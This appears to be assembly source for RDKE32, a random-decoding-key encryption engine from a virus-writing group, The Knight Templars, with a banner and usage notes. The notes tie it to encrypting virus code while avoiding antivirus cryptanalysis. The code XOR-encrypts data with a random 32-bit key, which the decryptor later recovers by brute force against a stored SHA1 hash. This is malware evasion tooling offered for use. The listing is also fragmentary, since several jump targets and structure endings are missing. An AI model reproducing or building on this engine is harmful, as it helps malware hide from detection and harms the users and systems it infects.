comment *
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                     ゚゚゚ロロロロロロ ワワ ゚゚゚  ゚゚゚ ワワワ ロロロロロロ゚゚゚
                         アロロロロ ロロロロロロ   ロロロロロロ ロロロロー
                          ロロロロ ロロロロロロ  イロロロロロ  ロロロロ
                          ロロロロ ゚ロロロロア ワロロロロイ   ロロロロ
                         ーロロロロ  ロロロロロ゚ロロロロ゚    ロロロロ
                         アロロロロ  ロロロロイ  ロロワワ    ロロロロー
           ワワワワワワワワワワワワワ イロロロロ  ロロロロア  ロロロロイワ  ロロロロア ワワワワワワワワワワワワ
          ロ              ロロロロロ  ロロロロイ  イロロロロロー ロロロロイ             ロ
          ロ              ロロロロロ ワロロロロロ   イロロロロイ ロロロロロ             ロ
          ゚ワ             ゚゚゚゚゚ ゚゚゚゚       ゚゚゚゚ ゚゚゚゚゚            ワ゚
           ワ゚゚゚゚゚゚゚゚゚゚゚゚゚゚゚゚�The Knight Templars�゚゚゚゚゚゚゚゚゚゚゚゚゚゚゚ワ
           ロ                                                    ロ
           ロ  Random Decoding Key Engine 32-bit v 1.0 [RDKE32]  ロ
           ロ                       Code by                      ロ
           ロ                     Darkman/TKT                    ロ
           ロ                                                    ロ

  Do not use this engine to encrypt known plaintext such as the actual virus
  code. It is possible to decrypt known plaintext encrypted with this
  engine using the X-RAY technique, also known as cryptanalysis. You can read
  more about this technique in "Detecting oh, roughly every polymorphic engine
  out there", an article by Rhincewind/VLAD, published in VLAD Magazine issue
  4. Billy Belcebu/iKx did this mistake in Win32.Legacy using his Internal
  ENCryptor v 1.0 [iENC], a Random Decoding Key (RDK) engine using a 8-bit
  eXclusive OR (XOR) algorithm to encrypt the actual virus in 19 different

  Length of Random Decoding Key Engine 32-bit v 1.0 [RDKE32]: 171 bytes.

hash_size               equ     (0a0h/08h)

_RDKE32Encrypt  struc
        _lpHash                                 dd      ?
        _lpBuffer                               dd      ?
        _dwNumberOfBytesToHashAndEncrypt        dd      ?
        _dwSecurityLevel                        dd      ?

_RDKE32Decrypt  struc
        _lpHash                         dd      ?
        _lpBuffer                       dd      ?
        _dwNumberOfBytesToDecrypt       dd      ?

_pushad struc
        _edi    dd      ?
        _esi    dd      ?
        _ebp    dd      ?
        _esp    dd      ?
        _ebx    dd      ?
        _edx    dd      ?
        _ecx    dd      ?
        _eax    dd      ?

; RDKE32Encrypt
; The RDKE32Encrypt function creates a hash and encrypts data.
;   VOID RDKE32Encrypt(
;     LPVOID lpHash  // data buffer to receive hash
;     LPVOID lpBuffer  // data buffer of data to hash and encrypt
;     DWORD dwNumberOfBytesToHashAndEncrypt  // number of bytes to hash and
;                                            // encrypt
;     DWORD dwSecurityLevel  // security level
;   );
; Parameters
; lpHash
;   [out] Pointer to the buffer that receives the hash.
; lpBuffer
;   [out] Pointer to the buffer containing the data to be hashed and encrypted.
; dwNumberOfBytesToHashAndEncrypt
;   [in] Specifies the number of bytes to be hashed and encrypted.
; dwSecurityLevel
;   [in] Specifies the security level of the encryption. The higher it is the
;   longer it will take for RDKE32Decrypt to bruteforce and decrypt the
;   encrypted data.
; Return Values
; This function does not return a value.

RDKE32Encrypt   proc                    ; Random Decoding Key Engine 32-bit
                                        ; v 1.00 [RDKE32] encryptor
        mov     edi,[esp._lpHash+size _pushad+04h]
                                        ; Pointer to the buffer that receives
                                        ; the hash
        mov     ebx,[esp._lpBuffer+size _pushad+04h]
                                        ; Pointer to the buffer containing the
                                        ; data to be hashed and encrypted
        mov     ecx,[esp._dwNumberOfBytesToHashAndEncrypt+size _pushad+04h]
                                        ; Specifies the number of bytes to be
                                        ; hashed and encrypted
        mov     eax,[esp._dwSecurityLevel+size _pushad+04h]
                                        ; Specifies the security level

        call    SHA1, edi, ecx, ebx
        call    GetRandomNumberWithinRange
        call    test_key_security
        jz      insecure_key

        call    cryptor

        ret     size _RDKE32Encrypt

; RDKE32Decrypt
; The RDKE32Decrypt function creates a hash and encrypts data.
;   VOID RDKE32Decrypt(
;     LPVOID lpHash  // data buffer of hash
;     LPVOID lpBuffer  // data buffer of data to decrypt
;     DWORD dwNumberOfBytesToDecrypt  // number of bytes to decrypt
;   );
; Parameters
; lpHash
;   [in] Pointer to the buffer containing the hash.
; lpBuffer
;   [out] Pointer to the buffer containing the data to decrypted.
; dwNumberOfBytesToDecrypt
;   [in] Specifies the number of bytes to be decrypted.
; Return Values
; This function does not return a value.

RDKE32Decrypt   proc                    ; Random Decoding Key Engine 32-bit
                                        ; v 1.00 [RDKE32] decryptor
        mov     edi,[esp._lpHash+size _pushad+04h]
                                        ; Pointer to the buffer of the hash
        mov     ebx,[esp._lpBuffer+size _pushad+04h]
                                        ; Pointer to the buffer containing the
                                        ; data to be decrypted
        mov     ecx,[esp._dwNumberOfBytesToDecrypt+size _pushad+04h]
                                        ; Specifies the number of bytes to be
                                        ; decrypted
        sub     esp,hash_size

        mov     esi,esp                 ; ESI = pointer to the hash
        xor     edx,edx
        inc     edx                     ; EDX = 32-bit encryption/decryption
                                        ; key
        call    test_key_security
        jz      bruteforce_loop

        call    cryptor

        call    SHA1, esi, ecx, ebx

        push    (hash_size/04h)
        pop     ecx
        rep     cmpsd                   ; Succesfully decrypted the buffer to
                                        ; be decrypted?
        je      RDKE32Decrypt_exit

        call    cryptor

        jmp     bruteforce_loop
        add     esp,hash_size

        ret     size _RDKE32Decrypt

test_key_security       proc            ; Test the security of the 32-bit key

        test    eax,eax                 ; Insecure key?
        jz      test_key_exit

        push    03h
        pop     ecx
        mov     eax,edx                 ; EDX = 32-bit encryption/decryption
                                        ; key
        mov     ebx,ecx
        rol     eax,08h

        test    al,dl
        jz      test_next_key

        cmp     al,dl                   ; Insecure key?
        je      test_key_exit
        dec     ebx
        jnz     _test_key_loop

        rol     edx,08h

        loop    test_key_loop

        inc     ecx                     ; Secure key


cryptor proc                            ; 32-bit encryptor/decryptor
        inc     ecx

        test    dl,dl                   ; Insecure key?
        jz      dont_crypt

        dec     ecx

        xor     [ebx],dl
        inc     ebx
        rol     edx,08h

        loop    crypt_loop


                db      ' [RDKE32] '
rdke32_size     equ     (rdke32_end-rdke32_begin)